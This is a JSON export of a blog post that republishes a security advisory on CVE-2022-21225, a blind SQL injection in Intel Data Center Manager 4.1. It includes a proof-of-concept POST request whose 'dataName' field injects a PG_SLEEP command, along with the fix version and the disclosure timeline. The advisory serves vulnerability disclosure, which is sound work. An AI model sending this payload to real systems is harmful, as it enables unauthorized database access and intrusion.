{"id":34565,"date":"2022-12-09T19:08:10","date_gmt":"2022-12-09T16:08:10","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/170180\/idcm41-sql.txt"},"modified":"2022-12-11T10:19:32","modified_gmt":"2022-12-11T06:49:32","slug":"intel-data-center-manager-4-1-sql-injection","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/intel-data-center-manager-4-1-sql-injection\/","title":{"rendered":"Intel Data Center Manager 4.1 SQL Injection"},"content":{"rendered":"<p>RCE Security Advisory<\/p>\n<blockquote class=\"wp-embedded-content\" data-secret=\"XecamJ3Rq0\"><p><a href=\"https:\/\/www.rcesecurity.com\/\" target=\"_blank\" rel=\"noopener\">Home<\/a><\/p><\/blockquote>\n<p><iframe loading=\"lazy\" class=\"wp-embedded-content\" sandbox=\"allow-scripts\" security=\"restricted\" style=\"position: absolute; clip: rect(1px, 1px, 1px, 1px);\" title=\"&#8220;Home&#8221; &#8212; RCE Security\" src=\"https:\/\/www.rcesecurity.com\/embed\/#?secret=GZvaZWQOEr#?secret=XecamJ3Rq0\" data-secret=\"XecamJ3Rq0\" width=\"500\" height=\"282\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"><\/iframe><\/p>\n<p>1. ADVISORY INFORMATION<br \/>\n=======================<br \/>\nProduct: Intel Data Center Manager<br \/>\nVendor URL: https:\/\/www.intel.com\/content\/www\/us\/en\/developer\/tools\/data-center-manager-console\/overview.html<br \/>\nType: SQL Injection [CWE-89]\nDate found: 2022-01-21<br \/>\nDate published: 2022-12-01<br \/>\nCVSSv3 Score: 9.9 (CVSS:3.1\/AV:N\/AC:L\/PR:L\/UI:N\/S:C\/C:H\/I:H\/A:H)<br \/>\nCVE: CVE-2022-21225<\/p>\n<p>2. CREDITS<br \/>\n==========<br \/>\nThis vulnerability was discovered and researched by Julien Ahrens from<br \/>\nRCE Security.<\/p>\n<p>3. VERSIONS AFFECTED<br \/>\n====================<br \/>\nIntel Data Center Manager 4.1 and below<\/p>\n<p>4. INTRODUCTION<br \/>\n===============<br \/>\nEnergy costs are the fastest rising expense for today\u2019s data centers. Intel\u00ae Data<br \/>\nCenter Manager (Intel\u00ae DCM) provides real-time power and thermal consumption data,<br \/>\ngiving you the clarity you need to lower power usage, increase rack density, and<br \/>\nprolong operation during outages.<\/p>\n<p>(from the vendor&#8217;s homepage)<\/p>\n<p>5. VULNERABILITY DETAILS<br \/>\n========================<br \/>\nIntel DCM&#8217;s endpoint at &#8220;\/DcmConsole\/DataAccessServlet?action=getRoomRackData&#8221; is<br \/>\nvulnerable to an authenticated, blind SQL Injection when user-supplied input to<br \/>\nthe HTTP POST parameter &#8220;dataName&#8221; is processed by the web application.<\/p>\n<p>Since the application does not properly validate and sanitize this parameter, an<br \/>\nattacker can inject arbitrary SQL commands against the PostgreSQL backend<br \/>\ndatabase server of the web application.<\/p>\n<p>Successful exploits can allow an authenticated attacker (the lowest possible<br \/>\nauthorization level &#8220;Guest&#8221; is sufficient) to read and modify database contents<br \/>\nand execute any system commands on the underlying operating system. This way,<br \/>\nthe attacker can compromise the system&#8217;s entire confidentiality, integrity, and<br \/>\navailability.<\/p>\n<p>6. PROOF OF CONCEPT<br \/>\n===================<br \/>\nPOST \/DcmConsole\/DataAccessServlet?action=getRoomRackData HTTP\/1.1<br \/>\nHost: [ip-address]\nCookie: JSESSIONID=[session-id]\nContent-Length: 153<br \/>\nAccept: application\/json, text\/plain, *\/*<br \/>\nContent-Type: text\/plain<br \/>\nUser-Agent: Mozilla\/5.0<br \/>\nAccept-Encoding: gzip, deflate<br \/>\nAccept-Language: en-GB,en-US;q=0.9,en;q=0.8<br \/>\nConnection: close<\/p>\n<p>{&#8220;antiCSRFId&#8221;:&#8221;[your-anti-csrf-id]&#8221;,&#8221;requestObj&#8221;:{&#8220;snapshotId&#8221;:1,&#8221;roomId&#8221;:1,&#8221;dataName&#8221;:&#8221;test&#8217;);SELECT PG_SLEEP(5)&#8211;&#8220;}}<\/p>\n<p>(see the referenced blog post for more details)<\/p>\n<p>7. SOLUTION<br \/>\n===========<br \/>\nUpdate at least to version 5.0.0.46307.<\/p>\n<p>8. REPORT TIMELINE<br \/>\n==================<br \/>\n2022-01-21: Discovery of the vulnerability<br \/>\n2022-01-21: Reported to vendor via their bug bounty program<br \/>\n2022-01-21: Vendor response: Sent to &#8220;appropriate reviewers&#8221;<br \/>\n2022-02-08: Vendor acknowledges the vulnerability with a severity of &#8220;medium&#8221; without sharing their CVSS calculation<br \/>\n2022-02-15: Endless back-and-forth discussions about the rating. Vendor proposes a rating of 6.8<br \/>\n2022-02-16: I don&#8217;t accept the rating because the vendor downplayed it<br \/>\n2022-02-25: After discussions, vendor rates issue as CVSS 9.0 (CVSS:3.1\/AV:A\/AC:L\/PR:L\/UI:N\/S:C\/C:H\/I:H\/A:H)<br \/>\n2022-02-25: Apparently AV:A is still wrong, but I don&#8217;t have more energy to fight them. However this advisory contains the proper CVSS rating.<br \/>\n2022-xx-xx: Vendor releases version 5.0.0.46307 which includes the fix<br \/>\n2022-08-09: Vendor releases advisory INTEL-SA-00662<br \/>\n2022-12-01: Public disclosure<\/p>\n<p>9. REFERENCES<br \/>\n==============<\/p>\n<blockquote class=\"wp-embedded-content\" data-secret=\"BbbykvzgRy\"><p><a href=\"https:\/\/www.rcesecurity.com\/2022\/12\/from-zero-to-hero-part-2-intel-dcm-sql-injection-to-rce-cve-2022-21225\/\" target=\"_blank\" rel=\"noopener\">From Zero to Hero Part 2: From SQL Injection to RCE on Intel DCM (CVE-2022-21225)<\/a><\/p><\/blockquote>\n<p><iframe loading=\"lazy\" class=\"wp-embedded-content\" sandbox=\"allow-scripts\" security=\"restricted\" style=\"position: absolute; clip: rect(1px, 1px, 1px, 1px);\" title=\"&#8220;From Zero to Hero Part 2: From SQL Injection to RCE on Intel DCM (CVE-2022-21225)&#8221; &#8212; RCE Security\" src=\"https:\/\/www.rcesecurity.com\/2022\/12\/from-zero-to-hero-part-2-intel-dcm-sql-injection-to-rce-cve-2022-21225\/embed\/#?secret=vvGQ2dwEh3#?secret=BbbykvzgRy\" data-secret=\"BbbykvzgRy\" width=\"500\" height=\"282\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"><\/iframe><br \/>\nhttps:\/\/www.intel.com\/content\/www\/us\/en\/security-center\/advisory\/intel-sa-00662.html<br \/>\nhttps:\/\/github.com\/MrTuxracer\/advisories<\/p>\n","protected":false},"excerpt":{"rendered":"<p>RCE Security Advisory Home 1. ADVISORY INFORMATION ======================= Product: Intel Data Center Manager Vendor URL: https:\/\/www.intel.com\/content\/www\/us\/en\/developer\/tools\/data-center-manager-console\/overview.html Type: SQL Injection [CWE-89] Date found: 2022-01-21 Date published: 2022-12-01 CVSSv3 Score: 9.9 (CVSS:3.1\/AV:N\/AC:L\/PR:L\/UI:N\/S:C\/C:H\/I:H\/A:H) CVE: CVE-2022-21225 2. CREDITS ========== This vulnerability was discovered and researched by Julien Ahrens from RCE Security. 3. VERSIONS AFFECTED ==================== Intel Data Center Manager &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-34565","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/34565","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=34565"}],"version-history":[{"count":1,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/34565\/revisions"}],"predecessor-version":[{"id":34718,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/34565\/revisions\/34718"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=34565"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=34565"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=34565"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}